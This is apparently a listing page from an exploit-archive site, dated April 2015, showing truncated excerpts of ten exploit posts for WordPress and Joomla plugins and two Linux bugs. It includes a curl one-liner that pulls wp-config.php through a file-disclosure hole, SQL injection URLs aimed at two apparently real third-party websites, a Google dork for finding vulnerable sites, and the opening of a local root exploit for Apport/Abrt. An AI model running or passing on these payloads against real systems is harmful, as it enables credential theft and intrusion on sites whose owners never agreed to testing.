WordPress Fusion Engage Local File Disclosure

16 April 2015 - Source: http://www.mondounix.com
Fusion Engage is a commercial wordpress plugin sold by internet marketer (and known scammer) Precious Ngwu to... I'm actually not sure. Something to do with video embedding.
 
Anyway, it has an LFD. Here's the relevant code:
 
function fe_get_sv_html(){
        global $wpdb, $video_db, $ann_db;
 
        print(file_get_contents($_POST['video']));
 
        wp_die();
}
add_action('wp_ajax_nopriv_fe_get_sv_html', 'fe_get_sv_html');
add_action('wp_ajax_fe_get_sv_html', 'fe_get_sv_html');
 
So, you can exploit it easily... quick curl one-liner to get wp-config.php:
curl --data "action=fe_get_sv_html&video=../wp-config.php" "http://exploitable-site/wp-admin/admin-ajax.php"
 
Precious...


WordPress Duplicator 0.5.14 Cross Site Request Forgery / SQL Injection

16 April 2015 - Source: http://www.mondounix.com
######################
 
# Exploit Title : Wordpress Duplicator <= 0.5.14 - SQL Injection & CSRF
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://lifeinthegrid.com/labs/duplicator/
 
# Software Link : https://downloads.wordpress.org/plugin/duplicator.0.5.14.zip
 
# Date : 2015-04-08
 
# Tested on : Linux / Mozilla Firefox         
 
######################
 
# Description
 
 Wordpress Duplicator 0.5.14 suffers from a remote SQL injection vulnerability.
 
 
 Location file: /view/actions.php
 
 This is the buggy ajax function, wp_ajax_duplicator_package_delete:
 
 function duplicator_package_delete() {
 
  DUP_Util::CheckPermissions('export');
 
...


WordPress Windows Desktop And iPhone Photo Uploader File Upload

16 April 2015 - Source: http://www.mondounix.com
##################################################################################################
#Exploit Title : Wordpress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerability
#Author        : Manish Kishan Tanwar AKA error1046
#Home Page     : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/
#Download Link : https://downloads.wordpress.org/plugin/i-dump-iphone-to-wordpress-photo-uploader.1.8.zip
#Date          : 9/04/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################
 
////////////////////////
///...


Linux Abrt / Apport Race Condition / Symlink

16 April 2015 - Source: http://www.mondounix.com
Hello, this is CVE-2015-1318 and CVE-2015-1862 (essentially the same bugs in two different implementations, apport and abrt respectively). These were discussed on the vendors list last week.
 
If the first character of kern.core_pattern sysctl is a pipe, the kernel will invoke the specified program, and pass it the core on stdin. Apport (Ubuntu) and Abrt (Fedora) use this feature to analyze and log crashes.
 
Since the introduction of containers, Abrt and Apport have attempted to transparently handle namespaces by chrooting into the same root as the crashing program [1] [2]. Unfortunately, this is incorrect because root cannot safely execve() after a chroot into a user specified directory.
 
Furthermore, Abrt suffers from numerous...


Linux Apport/Abrt Local Root Exploit

15 April 2015 - Source: http://www.mondounix.com
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <elf.h>
#include <err.h>
#include <syslog.h>
#include <sched.h>
#include <linux/sched.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/auxv.h>
#include <sys/wait.h>
 
# warning this file must be compiled with -static
 
//
// Apport/Abrt Vulnerability Demo Exploit.
//
//  Apport: CVE-2015-1318
//  Abrt:   CVE-2015-1862
// 
//   -- taviso@cmpxchg8b.com, April 2015.
//
// $ gcc -static newpid.c
// $ ./a.out
// uid=0(root) gid=0(root) groups=0(root)
// sh-4.3# exit
// exit
//
// Hint: To...


Linux splice_write Kernel Panic

14 April 2015 - Source: http://www.mondounix.com
/* ----------------------------------------------------------------------------------------------------
 * cve-2014-7822_poc.c
 * 
 * The implementation of certain splice_write file operations in the Linux kernel before 3.16 does not enforce a restriction on the maximum size of a single file
 * which allows local users to cause a denial of service (system crash) or possibly have unspecified other impact via a crafted splice system call, 
 * as demonstrated by use of a file descriptor associated with an ext4 filesystem. 
 *
 * 
 * This is a POC to reproduce vulnerability. No exploitation here, just simple kernel panic.
 * Works on ext4 filesystem
 * Tested on Ubuntu with 3.13 and 3.14 kernels
 * 
 * Compile with gcc -fno-stack-protector...


WordPress Shareaholic 7.6.0.3 Cross Site Scripting

8 April 2015 - Source: http://www.mondounix.com
# Exploit Title: Shareaholic 7.6.0.3 XSS
# Date: 10-11-2014
# Software Link: https://wordpress.org/plugins/shareaholic/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9311
# Category: webapps
 
1. Description
 
ShareaholicAdmin::add_location is accessible for every registered user.
 
File: shareaholic\shareaholic.php
 
add_action('wp_ajax_shareaholic_add_location',  array('ShareaholicAdmin', 'add_location'));
 
 
$_POST['location'] is not escaped.
 
File: shareaholic\admin.php
 
public static function add_location() {
  $location = $_POST['location'];
  $app_name = $location['app_name'];
  ShareaholicUtilities::update_options(array(
...


Joomla Contact Form Maker 1.0.1 SQL Injection

3 April 2015 - Source: http://www.mondounix.com
[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 29/03/2015
[+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker
[+]Type:WebApp
[+]Risk:High
[+]Overview:
Contact Form Maker v1.0.1 suffers from an SQL injection vulnerability.
 
[+]Proof Of Concept:
 
127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL
 
 
https://hmg-e-publishing.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1%27
http://ariane.com/index.php?option=com_contactformmaker&view=contactformmaker&id=-1'


...


Joomla Gallery WD SQL Injection

3 April 2015 - Source: http://www.mondounix.com
######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################
 
The 'theme_id' GET parameter is vulnerable.
 
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT...


WordPress Revolution Slider File Upload

3 April 2015 - Source: http://www.mondounix.com
######################################################################
# Exploit Title: Wordpress Plugin Revolution Slider - Unrestricted File Upload
# Google Dork: Y0ur Brain
# Date: 27.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://revolution.themepunch.com/
# Version: old
# Tested on: Windows
######################################################################
 
 
# Path of File : /wp-content/plugins/revslider/revslider_admin.php
# Vulnerable File : revslider_admin.php
 
232.    $action = self::getPostGetVar("client_action");
233.    $data = self::getPostGetVar("data");
...
301.    case "get_captions_css":
302.     $contentCSS = $operations->getCaptionsContent();
303....
